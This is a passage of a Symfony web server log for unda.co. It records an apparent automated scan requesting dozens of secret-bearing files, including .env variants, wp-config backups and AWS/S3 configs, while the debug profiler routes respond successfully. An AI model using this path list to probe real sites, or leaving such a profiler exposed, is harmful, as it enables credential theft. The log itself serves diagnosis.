  8156. [2025-12-20 20:36:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/aws.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/aws.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8157. [2025-12-20 20:37:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8158. [2025-12-20 20:37:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/aws.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/aws.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8159. [2025-12-20 20:37:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8160. [2025-12-20 20:37:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=exception","method":"GET"} []
  8161. [2025-12-20 20:37:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  8162. [2025-12-20 20:37:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/constants.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/constants.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8163. [2025-12-20 20:38:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/libs/aws-notifications.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/libs/aws-notifications.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8164. [2025-12-20 20:38:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/main.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/main.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8165. [2025-12-20 20:38:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/main.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/main.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8166. [2025-12-20 20:38:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8167. [2025-12-20 20:39:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8168. [2025-12-20 20:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=config","method":"GET"} []
  8169. [2025-12-20 20:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8170. [2025-12-20 20:39:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=cache","method":"GET"} []
  8171. [2025-12-20 20:39:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8172. [2025-12-20 20:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8173. [2025-12-20 20:39:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8174. [2025-12-20 20:40:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.app.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.app.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8175. [2025-12-20 20:40:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8176. [2025-12-20 20:40:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tsconfig.spec.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tsconfig.spec.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8177. [2025-12-20 20:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /utils/awsS3.util.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /utils/awsS3.util.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8178. [2025-12-20 20:41:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /utils/s3Client.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /utils/s3Client.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8179. [2025-12-20 20:42:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.php.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.php.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8180. [2025-12-20 20:42:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.php.old"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.php.old\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8181. [2025-12-20 20:42:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp_mail_smtp.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp_mail_smtp.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8182. [2025-12-20 20:43:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b5b8fb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b5b8fb","method":"GET"} []
  8183. [2025-12-20 20:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8184. [2025-12-20 20:43:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8185. [2025-12-20 20:43:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/laravel/app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/laravel/app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8186. [2025-12-20 20:43:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8187. [2025-12-20 20:43:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env-example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env-example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8188. [2025-12-20 20:43:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env-sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env-sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8189. [2025-12-20 20:43:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.backup"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.backup\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8190. [2025-12-20 20:43:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8191. [2025-12-20 20:43:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8192. [2025-12-20 20:43:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.dev"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.dev\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8193. [2025-12-20 20:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8194. [2025-12-20 20:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8195. [2025-12-20 20:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.development.sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.development.sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8196. [2025-12-20 20:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8197. [2025-12-20 20:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.docker"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.docker\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8198. [2025-12-20 20:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.docker.dev"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.docker.dev\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8199. [2025-12-20 20:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8200. [2025-12-20 20:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.int"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.int\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8201. [2025-12-20 20:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.live"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.live\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8202. [2025-12-20 20:44:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8203. [2025-12-20 20:44:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.local.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.local.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
